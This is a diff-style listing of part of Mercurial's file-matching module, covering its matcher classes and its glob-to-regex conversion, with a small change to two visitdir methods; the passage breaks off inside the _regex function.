265 265 def _donormalize(patterns, default, root, cwd, auditor=None, warn=None):
266 266 '''Convert 'kind:pat' from the patterns list to tuples with kind and
267 267 normalized and rooted patterns and with listfiles expanded.'''
268 268 kindpats = []
269 269 for kind, pat in [_patsplit(p, default) for p in patterns]:
270 270 if kind in cwdrelativepatternkinds:
271 271 pat = pathutil.canonpath(root, cwd, pat, auditor=auditor)
272 272 elif kind in ('relglob', 'path', 'rootfilesin', 'rootglob'):
273 273 pat = util.normpath(pat)
274 274 elif kind in ('listfile', 'listfile0'):
275 275 try:
276 276 files = util.readfile(pat)
277 277 if kind == 'listfile0':
278 278 files = files.split('\0')
279 279 else:
280 280 files = files.splitlines()
281 281 files = [f for f in files if f]
282 282 except EnvironmentError:
283 283 raise error.Abort(_("unable to read file list (%s)") % pat)
284 284 for k, p, source in _donormalize(files, default, root, cwd,
285 285 auditor, warn):
286 286 kindpats.append((k, p, pat))
287 287 continue
288 288 elif kind == 'include':
289 289 try:
290 290 fullpath = os.path.join(root, util.localpath(pat))
291 291 includepats = readpatternfile(fullpath, warn)
292 292 for k, p, source in _donormalize(includepats, default,
293 293 root, cwd, auditor, warn):
294 294 kindpats.append((k, p, source or pat))
295 295 except error.Abort as inst:
296 296 raise error.Abort('%s: %s' % (pat, inst[0]))
297 297 except IOError as inst:
298 298 if warn:
299 299 warn(_("skipping unreadable pattern file '%s': %s\n") %
300 300 (pat, stringutil.forcebytestr(inst.strerror)))
301 301 continue
302 302 # else: re or relre - which cannot be normalized
303 303 kindpats.append((kind, pat, ''))
304 304 return kindpats
305 305
306 306 class basematcher(object):
307 307
308 308 def __init__(self, badfn=None):
309 309 if badfn is not None:
310 310 self.bad = badfn
311 311
312 312 def __call__(self, fn):
313 313 return self.matchfn(fn)
314 314 # Callbacks related to how the matcher is used by dirstate.walk.
315 315 # Subscribers to these events must monkeypatch the matcher object.
316 316 def bad(self, f, msg):
317 317 '''Callback from dirstate.walk for each explicit file that can't be
318 318 found/accessed, with an error message.'''
319 319
320 320 # If an explicitdir is set, it will be called when an explicitly listed
321 321 # directory is visited.
322 322 explicitdir = None
323 323
324 324 # If an traversedir is set, it will be called when a directory discovered
325 325 # by recursive traversal is visited.
326 326 traversedir = None
327 327
328 328 @propertycache
329 329 def _files(self):
330 330 return []
331 331
332 332 def files(self):
333 333 '''Explicitly listed files or patterns or roots:
334 334 if no patterns or .always(): empty list,
335 335 if exact: list exact files,
336 336 if not .anypats(): list all files and dirs,
337 337 else: optimal roots'''
338 338 return self._files
339 339
340 340 @propertycache
341 341 def _fileset(self):
342 342 return set(self._files)
343 343
344 344 def exact(self, f):
345 345 '''Returns True if f is in .files().'''
346 346 return f in self._fileset
347 347
348 348 def matchfn(self, f):
349 349 return False
350 350
351 351 def visitdir(self, dir):
352 352 '''Decides whether a directory should be visited based on whether it
353 353 has potential matches in it or one of its subdirectories. This is
354 354 based on the match's primary, included, and excluded patterns.
355 355
356 356 Returns the string 'all' if the given directory and all subdirectories
357 357 should be visited. Otherwise returns True or False indicating whether
358 358 the given directory should be visited.
359 359 '''
360 360 return True
361 361
362 362 def visitchildrenset(self, dir):
363 363 '''Decides whether a directory should be visited based on whether it
364 364 has potential matches in it or one of its subdirectories, and
365 365 potentially lists which subdirectories of that directory should be
366 366 visited. This is based on the match's primary, included, and excluded
367 367 patterns.
368 368
369 369 This function is very similar to 'visitdir', and the following mapping
370 370 can be applied:
371 371
372 372 visitdir | visitchildrenlist
373 373 ----------+-------------------
374 374 False | set()
375 375 'all' | 'all'
376 376 True | 'this' OR non-empty set of subdirs -or files- to visit
377 377
378 378 Example:
379 379 Assume matchers ['path:foo/bar', 'rootfilesin:qux'], we would return
380 380 the following values (assuming the implementation of visitchildrenset
381 381 is capable of recognizing this; some implementations are not).
382 382
383 383 '' -> {'foo', 'qux'}
384 384 'baz' -> set()
385 385 'foo' -> {'bar'}
386 386 # Ideally this would be 'all', but since the prefix nature of matchers
387 387 # is applied to the entire matcher, we have to downgrade this to
388 388 # 'this' due to the non-prefix 'rootfilesin'-kind matcher being mixed
389 389 # in.
390 390 'foo/bar' -> 'this'
391 391 'qux' -> 'this'
392 392
393 393 Important:
394 394 Most matchers do not know if they're representing files or
395 395 directories. They see ['path:dir/f'] and don't know whether 'f' is a
396 396 file or a directory, so visitchildrenset('dir') for most matchers will
397 397 return {'f'}, but if the matcher knows it's a file (like exactmatcher
398 398 does), it may return 'this'. Do not rely on the return being a set
399 399 indicating that there are no files in this dir to investigate (or
400 400 equivalently that if there are files to investigate in 'dir' that it
401 401 will always return 'this').
402 402 '''
403 403 return 'this'
404 404
405 405 def always(self):
406 406 '''Matcher will match everything and .files() will be empty --
407 407 optimization might be possible.'''
408 408 return False
409 409
410 410 def isexact(self):
411 411 '''Matcher will match exactly the list of files in .files() --
412 412 optimization might be possible.'''
413 413 return False
414 414
415 415 def prefix(self):
416 416 '''Matcher will match the paths in .files() recursively --
417 417 optimization might be possible.'''
418 418 return False
419 419
420 420 def anypats(self):
421 421 '''None of .always(), .isexact(), and .prefix() is true --
422 422 optimizations will be difficult.'''
423 423 return not self.always() and not self.isexact() and not self.prefix()
424 424
425 425 class alwaysmatcher(basematcher):
426 426 '''Matches everything.'''
427 427
428 428 def __init__(self, badfn=None):
429 429 super(alwaysmatcher, self).__init__(badfn)
430 430
431 431 def always(self):
432 432 return True
433 433
434 434 def matchfn(self, f):
435 435 return True
436 436
437 437 def visitdir(self, dir):
438 438 return 'all'
439 439
440 440 def visitchildrenset(self, dir):
441 441 return 'all'
442 442
443 443 def __repr__(self):
444 444 return r'<alwaysmatcher>'
445 445
446 446 class nevermatcher(basematcher):
447 447 '''Matches nothing.'''
448 448
449 449 def __init__(self, badfn=None):
450 450 super(nevermatcher, self).__init__(badfn)
451 451
452 452 # It's a little weird to say that the nevermatcher is an exact matcher
453 453 # or a prefix matcher, but it seems to make sense to let callers take
454 454 # fast paths based on either. There will be no exact matches, nor any
455 455 # prefixes (files() returns []), so fast paths iterating over them should
456 456 # be efficient (and correct).
457 457 def isexact(self):
458 458 return True
459 459
460 460 def prefix(self):
461 461 return True
462 462
463 463 def visitdir(self, dir):
464 464 return False
465 465
466 466 def visitchildrenset(self, dir):
467 467 return set()
468 468
469 469 def __repr__(self):
470 470 return r'<nevermatcher>'
471 471
472 472 class predicatematcher(basematcher):
473 473 """A matcher adapter for a simple boolean function"""
474 474
475 475 def __init__(self, predfn, predrepr=None, badfn=None):
476 476 super(predicatematcher, self).__init__(badfn)
477 477 self.matchfn = predfn
478 478 self._predrepr = predrepr
479 479
480 480 @encoding.strmethod
481 481 def __repr__(self):
482 482 s = (stringutil.buildrepr(self._predrepr)
483 483 or pycompat.byterepr(self.matchfn))
484 484 return '<predicatenmatcher pred=%s>' % s
485 485
486 486 def normalizerootdir(dir, funcname):
487 487 if dir == '.':
488 488 util.nouideprecwarn("match.%s() no longer accepts "
489 489 "'.', use '' instead." % funcname, '5.1')
490 490 return ''
491 491 return dir
492 492
493 493
494 494 class patternmatcher(basematcher):
495 495 """Matches a set of (kind, pat, source) against a 'root' directory.
496 496
497 497 >>> kindpats = [
498 498 ... (b're', br'.*\.c$', b''),
499 499 ... (b'path', b'foo/a', b''),
500 500 ... (b'relpath', b'b', b''),
501 501 ... (b'glob', b'*.h', b''),
502 502 ... ]
503 503 >>> m = patternmatcher(b'foo', kindpats)
504 504 >>> m(b'main.c') # matches re:.*\.c$
505 505 True
506 506 >>> m(b'b.txt')
507 507 False
508 508 >>> m(b'foo/a') # matches path:foo/a
509 509 True
510 510 >>> m(b'a') # does not match path:b, since 'root' is 'foo'
511 511 False
512 512 >>> m(b'b') # matches relpath:b, since 'root' is 'foo'
513 513 True
514 514 >>> m(b'lib.h') # matches glob:*.h
515 515 True
516 516
517 517 >>> m.files()
518 518 ['', 'foo/a', 'b', '']
519 519 >>> m.exact(b'foo/a')
520 520 True
521 521 >>> m.exact(b'b')
522 522 True
523 523 >>> m.exact(b'lib.h') # exact matches are for (rel)path kinds
524 524 False
525 525 """
526 526
527 527 def __init__(self, root, kindpats, badfn=None):
528 528 super(patternmatcher, self).__init__(badfn)
529 529
530 530 self._files = _explicitfiles(kindpats)
531 531 self._prefix = _prefix(kindpats)
532 532 self._pats, self.matchfn = _buildmatch(kindpats, '$', root)
533 533
534 534 @propertycache
535 535 def _dirs(self):
536 536 return set(util.dirs(self._fileset)) | {''}
537 537
538 538 def visitdir(self, dir):
539 539 dir = normalizerootdir(dir, 'visitdir')
540 540 if self._prefix and dir in self._fileset:
541 541 return 'all'
542 return ('' in self._fileset or
543 dir in self._fileset or
542 return (dir in self._fileset or
544 543 dir in self._dirs or
545 544 any(parentdir in self._fileset
546 545 for parentdir in util.finddirs(dir)))
547 546
548 547 def visitchildrenset(self, dir):
549 548 ret = self.visitdir(dir)
550 549 if ret is True:
551 550 return 'this'
552 551 elif not ret:
553 552 return set()
554 553 assert ret == 'all'
555 554 return 'all'
556 555
557 556 def prefix(self):
558 557 return self._prefix
559 558
560 559 @encoding.strmethod
561 560 def __repr__(self):
562 561 return ('<patternmatcher patterns=%r>' % pycompat.bytestr(self._pats))
563 562
564 563 # This is basically a reimplementation of util.dirs that stores the children
565 564 # instead of just a count of them, plus a small optional optimization to avoid
566 565 # some directories we don't need.
567 566 class _dirchildren(object):
568 567 def __init__(self, paths, onlyinclude=None):
569 568 self._dirs = {}
570 569 self._onlyinclude = onlyinclude or []
571 570 addpath = self.addpath
572 571 for f in paths:
573 572 addpath(f)
574 573
575 574 def addpath(self, path):
576 575 if path == '':
577 576 return
578 577 dirs = self._dirs
579 578 findsplitdirs = _dirchildren._findsplitdirs
580 579 for d, b in findsplitdirs(path):
581 580 if d not in self._onlyinclude:
582 581 continue
583 582 dirs.setdefault(d, set()).add(b)
584 583
585 584 @staticmethod
586 585 def _findsplitdirs(path):
587 586 # yields (dirname, basename) tuples, walking back to the root. This is
588 587 # very similar to util.finddirs, except:
589 588 # - produces a (dirname, basename) tuple, not just 'dirname'
590 589 # - includes root dir
591 590 # Unlike manifest._splittopdir, this does not suffix `dirname` with a
592 591 # slash.
593 592 oldpos = len(path)
594 593 pos = path.rfind('/')
595 594 while pos != -1:
596 595 yield path[:pos], path[pos + 1:oldpos]
597 596 oldpos = pos
598 597 pos = path.rfind('/', 0, pos)
599 598 yield '', path[:oldpos]
600 599
601 600 def get(self, path):
602 601 return self._dirs.get(path, set())
603 602
604 603 class includematcher(basematcher):
605 604
606 605 def __init__(self, root, kindpats, badfn=None):
607 606 super(includematcher, self).__init__(badfn)
608 607
609 608 self._pats, self.matchfn = _buildmatch(kindpats, '(?:/|$)', root)
610 609 self._prefix = _prefix(kindpats)
611 610 roots, dirs, parents = _rootsdirsandparents(kindpats)
612 611 # roots are directories which are recursively included.
613 612 self._roots = set(roots)
614 613 # dirs are directories which are non-recursively included.
615 614 self._dirs = set(dirs)
616 615 # parents are directories which are non-recursively included because
617 616 # they are needed to get to items in _dirs or _roots.
618 617 self._parents = set(parents)
619 618
620 619 def visitdir(self, dir):
621 620 dir = normalizerootdir(dir, 'visitdir')
622 621 if self._prefix and dir in self._roots:
623 622 return 'all'
624 return ('' in self._roots or
625 dir in self._roots or
623 return (dir in self._roots or
626 624 dir in self._dirs or
627 625 dir in self._parents or
628 626 any(parentdir in self._roots
629 627 for parentdir in util.finddirs(dir)))
630 628
631 629 @propertycache
632 630 def _allparentschildren(self):
633 631 # It may seem odd that we add dirs, roots, and parents, and then
634 632 # restrict to only parents. This is to catch the case of:
635 633 # dirs = ['foo/bar']
636 634 # parents = ['foo']
637 635 # if we asked for the children of 'foo', but had only added
638 636 # self._parents, we wouldn't be able to respond ['bar'].
639 637 return _dirchildren(
640 638 itertools.chain(self._dirs, self._roots, self._parents),
641 639 onlyinclude=self._parents)
642 640
643 641 def visitchildrenset(self, dir):
644 642 if self._prefix and dir in self._roots:
645 643 return 'all'
646 644 # Note: this does *not* include the 'dir in self._parents' case from
647 645 # visitdir, that's handled below.
648 646 if ('' in self._roots or
649 647 dir in self._roots or
650 648 dir in self._dirs or
651 649 any(parentdir in self._roots
652 650 for parentdir in util.finddirs(dir))):
653 651 return 'this'
654 652
655 653 if dir in self._parents:
656 654 return self._allparentschildren.get(dir) or set()
657 655 return set()
658 656
659 657 @encoding.strmethod
660 658 def __repr__(self):
661 659 return ('<includematcher includes=%r>' % pycompat.bytestr(self._pats))
662 660
663 661 class exactmatcher(basematcher):
664 662 r'''Matches the input files exactly. They are interpreted as paths, not
665 663 patterns (so no kind-prefixes).
666 664
667 665 >>> m = exactmatcher([b'a.txt', br're:.*\.c$'])
668 666 >>> m(b'a.txt')
669 667 True
670 668 >>> m(b'b.txt')
671 669 False
672 670
673 671 Input files that would be matched are exactly those returned by .files()
674 672 >>> m.files()
675 673 ['a.txt', 're:.*\\.c$']
676 674
677 675 So pattern 're:.*\.c$' is not considered as a regex, but as a file name
678 676 >>> m(b'main.c')
679 677 False
680 678 >>> m(br're:.*\.c$')
681 679 True
682 680 '''
683 681
684 682 def __init__(self, files, badfn=None):
685 683 super(exactmatcher, self).__init__(badfn)
686 684
687 685 if isinstance(files, list):
688 686 self._files = files
689 687 else:
690 688 self._files = list(files)
691 689
692 690 matchfn = basematcher.exact
693 691
694 692 @propertycache
695 693 def _dirs(self):
696 694 return set(util.dirs(self._fileset)) | {''}
697 695
698 696 def visitdir(self, dir):
699 697 dir = normalizerootdir(dir, 'visitdir')
700 698 return dir in self._dirs
701 699
702 700 def visitchildrenset(self, dir):
703 701 dir = normalizerootdir(dir, 'visitchildrenset')
704 702
705 703 if not self._fileset or dir not in self._dirs:
706 704 return set()
707 705
708 706 candidates = self._fileset | self._dirs - {''}
709 707 if dir != '':
710 708 d = dir + '/'
711 709 candidates = set(c[len(d):] for c in candidates if
712 710 c.startswith(d))
713 711 # self._dirs includes all of the directories, recursively, so if
714 712 # we're attempting to match foo/bar/baz.txt, it'll have '', 'foo',
715 713 # 'foo/bar' in it. Thus we can safely ignore a candidate that has a
716 714 # '/' in it, indicating a it's for a subdir-of-a-subdir; the
717 715 # immediate subdir will be in there without a slash.
718 716 ret = {c for c in candidates if '/' not in c}
719 717 # We really do not expect ret to be empty, since that would imply that
720 718 # there's something in _dirs that didn't have a file in _fileset.
721 719 assert ret
722 720 return ret
723 721
724 722 def isexact(self):
725 723 return True
726 724
727 725 @encoding.strmethod
728 726 def __repr__(self):
729 727 return ('<exactmatcher files=%r>' % self._files)
730 728
731 729 class differencematcher(basematcher):
732 730 '''Composes two matchers by matching if the first matches and the second
733 731 does not.
734 732
735 733 The second matcher's non-matching-attributes (bad, explicitdir,
736 734 traversedir) are ignored.
737 735 '''
738 736 def __init__(self, m1, m2):
739 737 super(differencematcher, self).__init__()
740 738 self._m1 = m1
741 739 self._m2 = m2
742 740 self.bad = m1.bad
743 741 self.explicitdir = m1.explicitdir
744 742 self.traversedir = m1.traversedir
745 743
746 744 def matchfn(self, f):
747 745 return self._m1(f) and not self._m2(f)
748 746
749 747 @propertycache
750 748 def _files(self):
751 749 if self.isexact():
752 750 return [f for f in self._m1.files() if self(f)]
753 751 # If m1 is not an exact matcher, we can't easily figure out the set of
754 752 # files, because its files() are not always files. For example, if
755 753 # m1 is "path:dir" and m2 is "rootfileins:.", we don't
756 754 # want to remove "dir" from the set even though it would match m2,
757 755 # because the "dir" in m1 may not be a file.
758 756 return self._m1.files()
759 757
760 758 def visitdir(self, dir):
761 759 if self._m2.visitdir(dir) == 'all':
762 760 return False
763 761 elif not self._m2.visitdir(dir):
764 762 # m2 does not match dir, we can return 'all' here if possible
765 763 return self._m1.visitdir(dir)
766 764 return bool(self._m1.visitdir(dir))
767 765
768 766 def visitchildrenset(self, dir):
769 767 m2_set = self._m2.visitchildrenset(dir)
770 768 if m2_set == 'all':
771 769 return set()
772 770 m1_set = self._m1.visitchildrenset(dir)
773 771 # Possible values for m1: 'all', 'this', set(...), set()
774 772 # Possible values for m2: 'this', set(...), set()
775 773 # If m2 has nothing under here that we care about, return m1, even if
776 774 # it's 'all'. This is a change in behavior from visitdir, which would
777 775 # return True, not 'all', for some reason.
778 776 if not m2_set:
779 777 return m1_set
780 778 if m1_set in ['all', 'this']:
781 779 # Never return 'all' here if m2_set is any kind of non-empty (either
782 780 # 'this' or set(foo)), since m2 might return set() for a
783 781 # subdirectory.
784 782 return 'this'
785 783 # Possible values for m1: set(...), set()
786 784 # Possible values for m2: 'this', set(...)
787 785 # We ignore m2's set results. They're possibly incorrect:
788 786 # m1 = path:dir/subdir, m2=rootfilesin:dir, visitchildrenset(''):
789 787 # m1 returns {'dir'}, m2 returns {'dir'}, if we subtracted we'd
790 788 # return set(), which is *not* correct, we still need to visit 'dir'!
791 789 return m1_set
792 790
793 791 def isexact(self):
794 792 return self._m1.isexact()
795 793
796 794 @encoding.strmethod
797 795 def __repr__(self):
798 796 return ('<differencematcher m1=%r, m2=%r>' % (self._m1, self._m2))
799 797
800 798 def intersectmatchers(m1, m2):
801 799 '''Composes two matchers by matching if both of them match.
802 800
803 801 The second matcher's non-matching-attributes (bad, explicitdir,
804 802 traversedir) are ignored.
805 803 '''
806 804 if m1 is None or m2 is None:
807 805 return m1 or m2
808 806 if m1.always():
809 807 m = copy.copy(m2)
810 808 # TODO: Consider encapsulating these things in a class so there's only
811 809 # one thing to copy from m1.
812 810 m.bad = m1.bad
813 811 m.explicitdir = m1.explicitdir
814 812 m.traversedir = m1.traversedir
815 813 return m
816 814 if m2.always():
817 815 m = copy.copy(m1)
818 816 return m
819 817 return intersectionmatcher(m1, m2)
820 818
821 819 class intersectionmatcher(basematcher):
822 820 def __init__(self, m1, m2):
823 821 super(intersectionmatcher, self).__init__()
824 822 self._m1 = m1
825 823 self._m2 = m2
826 824 self.bad = m1.bad
827 825 self.explicitdir = m1.explicitdir
828 826 self.traversedir = m1.traversedir
829 827
830 828 @propertycache
831 829 def _files(self):
832 830 if self.isexact():
833 831 m1, m2 = self._m1, self._m2
834 832 if not m1.isexact():
835 833 m1, m2 = m2, m1
836 834 return [f for f in m1.files() if m2(f)]
837 835 # It neither m1 nor m2 is an exact matcher, we can't easily intersect
838 836 # the set of files, because their files() are not always files. For
839 837 # example, if intersecting a matcher "-I glob:foo.txt" with matcher of
840 838 # "path:dir2", we don't want to remove "dir2" from the set.
841 839 return self._m1.files() + self._m2.files()
842 840
843 841 def matchfn(self, f):
844 842 return self._m1(f) and self._m2(f)
845 843
846 844 def visitdir(self, dir):
847 845 visit1 = self._m1.visitdir(dir)
848 846 if visit1 == 'all':
849 847 return self._m2.visitdir(dir)
850 848 # bool() because visit1=True + visit2='all' should not be 'all'
851 849 return bool(visit1 and self._m2.visitdir(dir))
852 850
853 851 def visitchildrenset(self, dir):
854 852 m1_set = self._m1.visitchildrenset(dir)
855 853 if not m1_set:
856 854 return set()
857 855 m2_set = self._m2.visitchildrenset(dir)
858 856 if not m2_set:
859 857 return set()
860 858
861 859 if m1_set == 'all':
862 860 return m2_set
863 861 elif m2_set == 'all':
864 862 return m1_set
865 863
866 864 if m1_set == 'this' or m2_set == 'this':
867 865 return 'this'
868 866
869 867 assert isinstance(m1_set, set) and isinstance(m2_set, set)
870 868 return m1_set.intersection(m2_set)
871 869
872 870 def always(self):
873 871 return self._m1.always() and self._m2.always()
874 872
875 873 def isexact(self):
876 874 return self._m1.isexact() or self._m2.isexact()
877 875
878 876 @encoding.strmethod
879 877 def __repr__(self):
880 878 return ('<intersectionmatcher m1=%r, m2=%r>' % (self._m1, self._m2))
881 879
882 880 class subdirmatcher(basematcher):
883 881 """Adapt a matcher to work on a subdirectory only.
884 882
885 883 The paths are remapped to remove/insert the path as needed:
886 884
887 885 >>> from . import pycompat
888 886 >>> m1 = match(b'root', b'', [b'a.txt', b'sub/b.txt'])
889 887 >>> m2 = subdirmatcher(b'sub', m1)
890 888 >>> m2(b'a.txt')
891 889 False
892 890 >>> m2(b'b.txt')
893 891 True
894 892 >>> m2.matchfn(b'a.txt')
895 893 False
896 894 >>> m2.matchfn(b'b.txt')
897 895 True
898 896 >>> m2.files()
899 897 ['b.txt']
900 898 >>> m2.exact(b'b.txt')
901 899 True
902 900 >>> def bad(f, msg):
903 901 ... print(pycompat.sysstr(b"%s: %s" % (f, msg)))
904 902 >>> m1.bad = bad
905 903 >>> m2.bad(b'x.txt', b'No such file')
906 904 sub/x.txt: No such file
907 905 """
908 906
909 907 def __init__(self, path, matcher):
910 908 super(subdirmatcher, self).__init__()
911 909 self._path = path
912 910 self._matcher = matcher
913 911 self._always = matcher.always()
914 912
915 913 self._files = [f[len(path) + 1:] for f in matcher._files
916 914 if f.startswith(path + "/")]
917 915
918 916 # If the parent repo had a path to this subrepo and the matcher is
919 917 # a prefix matcher, this submatcher always matches.
920 918 if matcher.prefix():
921 919 self._always = any(f == path for f in matcher._files)
922 920
923 921 def bad(self, f, msg):
924 922 self._matcher.bad(self._path + "/" + f, msg)
925 923
926 924 def matchfn(self, f):
927 925 # Some information is lost in the superclass's constructor, so we
928 926 # can not accurately create the matching function for the subdirectory
929 927 # from the inputs. Instead, we override matchfn() and visitdir() to
930 928 # call the original matcher with the subdirectory path prepended.
931 929 return self._matcher.matchfn(self._path + "/" + f)
932 930
933 931 def visitdir(self, dir):
934 932 dir = normalizerootdir(dir, 'visitdir')
935 933 if dir == '':
936 934 dir = self._path
937 935 else:
938 936 dir = self._path + "/" + dir
939 937 return self._matcher.visitdir(dir)
940 938
941 939 def visitchildrenset(self, dir):
942 940 dir = normalizerootdir(dir, 'visitchildrenset')
943 941 if dir == '':
944 942 dir = self._path
945 943 else:
946 944 dir = self._path + "/" + dir
947 945 return self._matcher.visitchildrenset(dir)
948 946
949 947 def always(self):
950 948 return self._always
951 949
952 950 def prefix(self):
953 951 return self._matcher.prefix() and not self._always
954 952
955 953 @encoding.strmethod
956 954 def __repr__(self):
957 955 return ('<subdirmatcher path=%r, matcher=%r>' %
958 956 (self._path, self._matcher))
959 957
960 958 class prefixdirmatcher(basematcher):
961 959 """Adapt a matcher to work on a parent directory.
962 960
963 961 The matcher's non-matching-attributes (bad, explicitdir, traversedir) are
964 962 ignored.
965 963
966 964 The prefix path should usually be the relative path from the root of
967 965 this matcher to the root of the wrapped matcher.
968 966
969 967 >>> m1 = match(util.localpath(b'root/d/e'), b'f', [b'../a.txt', b'b.txt'])
970 968 >>> m2 = prefixdirmatcher(b'd/e', m1)
971 969 >>> m2(b'a.txt')
972 970 False
973 971 >>> m2(b'd/e/a.txt')
974 972 True
975 973 >>> m2(b'd/e/b.txt')
976 974 False
977 975 >>> m2.files()
978 976 ['d/e/a.txt', 'd/e/f/b.txt']
979 977 >>> m2.exact(b'd/e/a.txt')
980 978 True
981 979 >>> m2.visitdir(b'd')
982 980 True
983 981 >>> m2.visitdir(b'd/e')
984 982 True
985 983 >>> m2.visitdir(b'd/e/f')
986 984 True
987 985 >>> m2.visitdir(b'd/e/g')
988 986 False
989 987 >>> m2.visitdir(b'd/ef')
990 988 False
991 989 """
992 990
993 991 def __init__(self, path, matcher, badfn=None):
994 992 super(prefixdirmatcher, self).__init__(badfn)
995 993 if not path:
996 994 raise error.ProgrammingError('prefix path must not be empty')
997 995 self._path = path
998 996 self._pathprefix = path + '/'
999 997 self._matcher = matcher
1000 998
1001 999 @propertycache
1002 1000 def _files(self):
1003 1001 return [self._pathprefix + f for f in self._matcher._files]
1004 1002
1005 1003 def matchfn(self, f):
1006 1004 if not f.startswith(self._pathprefix):
1007 1005 return False
1008 1006 return self._matcher.matchfn(f[len(self._pathprefix):])
1009 1007
1010 1008 @propertycache
1011 1009 def _pathdirs(self):
1012 1010 return set(util.finddirs(self._path)) | {''}
1013 1011
1014 1012 def visitdir(self, dir):
1015 1013 if dir == self._path:
1016 1014 return self._matcher.visitdir('')
1017 1015 if dir.startswith(self._pathprefix):
1018 1016 return self._matcher.visitdir(dir[len(self._pathprefix):])
1019 1017 return dir in self._pathdirs
1020 1018
1021 1019 def visitchildrenset(self, dir):
1022 1020 if dir == self._path:
1023 1021 return self._matcher.visitchildrenset('')
1024 1022 if dir.startswith(self._pathprefix):
1025 1023 return self._matcher.visitchildrenset(dir[len(self._pathprefix):])
1026 1024 if dir in self._pathdirs:
1027 1025 return 'this'
1028 1026 return set()
1029 1027
1030 1028 def isexact(self):
1031 1029 return self._matcher.isexact()
1032 1030
1033 1031 def prefix(self):
1034 1032 return self._matcher.prefix()
1035 1033
1036 1034 @encoding.strmethod
1037 1035 def __repr__(self):
1038 1036 return ('<prefixdirmatcher path=%r, matcher=%r>'
1039 1037 % (pycompat.bytestr(self._path), self._matcher))
1040 1038
1041 1039 class unionmatcher(basematcher):
1042 1040 """A matcher that is the union of several matchers.
1043 1041
1044 1042 The non-matching-attributes (bad, explicitdir, traversedir) are taken from
1045 1043 the first matcher.
1046 1044 """
1047 1045
1048 1046 def __init__(self, matchers):
1049 1047 m1 = matchers[0]
1050 1048 super(unionmatcher, self).__init__()
1051 1049 self.explicitdir = m1.explicitdir
1052 1050 self.traversedir = m1.traversedir
1053 1051 self._matchers = matchers
1054 1052
1055 1053 def matchfn(self, f):
1056 1054 for match in self._matchers:
1057 1055 if match(f):
1058 1056 return True
1059 1057 return False
1060 1058
1061 1059 def visitdir(self, dir):
1062 1060 r = False
1063 1061 for m in self._matchers:
1064 1062 v = m.visitdir(dir)
1065 1063 if v == 'all':
1066 1064 return v
1067 1065 r |= v
1068 1066 return r
1069 1067
1070 1068 def visitchildrenset(self, dir):
1071 1069 r = set()
1072 1070 this = False
1073 1071 for m in self._matchers:
1074 1072 v = m.visitchildrenset(dir)
1075 1073 if not v:
1076 1074 continue
1077 1075 if v == 'all':
1078 1076 return v
1079 1077 if this or v == 'this':
1080 1078 this = True
1081 1079 # don't break, we might have an 'all' in here.
1082 1080 continue
1083 1081 assert isinstance(v, set)
1084 1082 r = r.union(v)
1085 1083 if this:
1086 1084 return 'this'
1087 1085 return r
1088 1086
1089 1087 @encoding.strmethod
1090 1088 def __repr__(self):
1091 1089 return ('<unionmatcher matchers=%r>' % self._matchers)
1092 1090
1093 1091 def patkind(pattern, default=None):
1094 1092 '''If pattern is 'kind:pat' with a known kind, return kind.
1095 1093
1096 1094 >>> patkind(br're:.*\.c$')
1097 1095 're'
1098 1096 >>> patkind(b'glob:*.c')
1099 1097 'glob'
1100 1098 >>> patkind(b'relpath:test.py')
1101 1099 'relpath'
1102 1100 >>> patkind(b'main.py')
1103 1101 >>> patkind(b'main.py', default=b're')
1104 1102 're'
1105 1103 '''
1106 1104 return _patsplit(pattern, default)[0]
1107 1105
1108 1106 def _patsplit(pattern, default):
1109 1107 """Split a string into the optional pattern kind prefix and the actual
1110 1108 pattern."""
1111 1109 if ':' in pattern:
1112 1110 kind, pat = pattern.split(':', 1)
1113 1111 if kind in allpatternkinds:
1114 1112 return kind, pat
1115 1113 return default, pattern
1116 1114
1117 1115 def _globre(pat):
1118 1116 r'''Convert an extended glob string to a regexp string.
1119 1117
1120 1118 >>> from . import pycompat
1121 1119 >>> def bprint(s):
1122 1120 ... print(pycompat.sysstr(s))
1123 1121 >>> bprint(_globre(br'?'))
1124 1122 .
1125 1123 >>> bprint(_globre(br'*'))
1126 1124 [^/]*
1127 1125 >>> bprint(_globre(br'**'))
1128 1126 .*
1129 1127 >>> bprint(_globre(br'**/a'))
1130 1128 (?:.*/)?a
1131 1129 >>> bprint(_globre(br'a/**/b'))
1132 1130 a/(?:.*/)?b
1133 1131 >>> bprint(_globre(br'[a*?!^][^b][!c]'))
1134 1132 [a*?!^][\^b][^c]
1135 1133 >>> bprint(_globre(br'{a,b}'))
1136 1134 (?:a|b)
1137 1135 >>> bprint(_globre(br'.\*\?'))
1138 1136 \.\*\?
1139 1137 '''
1140 1138 i, n = 0, len(pat)
1141 1139 res = ''
1142 1140 group = 0
1143 1141 escape = util.stringutil.regexbytesescapemap.get
1144 1142 def peek():
1145 1143 return i < n and pat[i:i + 1]
1146 1144 while i < n:
1147 1145 c = pat[i:i + 1]
1148 1146 i += 1
1149 1147 if c not in '*?[{},\\':
1150 1148 res += escape(c, c)
1151 1149 elif c == '*':
1152 1150 if peek() == '*':
1153 1151 i += 1
1154 1152 if peek() == '/':
1155 1153 i += 1
1156 1154 res += '(?:.*/)?'
1157 1155 else:
1158 1156 res += '.*'
1159 1157 else:
1160 1158 res += '[^/]*'
1161 1159 elif c == '?':
1162 1160 res += '.'
1163 1161 elif c == '[':
1164 1162 j = i
1165 1163 if j < n and pat[j:j + 1] in '!]':
1166 1164 j += 1
1167 1165 while j < n and pat[j:j + 1] != ']':
1168 1166 j += 1
1169 1167 if j >= n:
1170 1168 res += '\\['
1171 1169 else:
1172 1170 stuff = pat[i:j].replace('\\','\\\\')
1173 1171 i = j + 1
1174 1172 if stuff[0:1] == '!':
1175 1173 stuff = '^' + stuff[1:]
1176 1174 elif stuff[0:1] == '^':
1177 1175 stuff = '\\' + stuff
1178 1176 res = '%s[%s]' % (res, stuff)
1179 1177 elif c == '{':
1180 1178 group += 1
1181 1179 res += '(?:'
1182 1180 elif c == '}' and group:
1183 1181 res += ')'
1184 1182 group -= 1
1185 1183 elif c == ',' and group:
1186 1184 res += '|'
1187 1185 elif c == '\\':
1188 1186 p = peek()
1189 1187 if p:
1190 1188 i += 1
1191 1189 res += escape(p, p)
1192 1190 else:
1193 1191 res += escape(c, c)
1194 1192 else:
1195 1193 res += escape(c, c)
1196 1194 return res
1197 1195
1198 1196 def _regex(kind, pat, globsuffix):
1199 1197 '''Convert a (normalized) pattern of any kind into a
1200 1198 regular expression.
1201 1199 globsuffix is appended to the regexp of globs.'''
1202 1200
1203 1201 if rustext is not None:
1204 1202 try:
1205 1203 return rustext.filepatterns.build_single_regex(
1206 1204 kind,
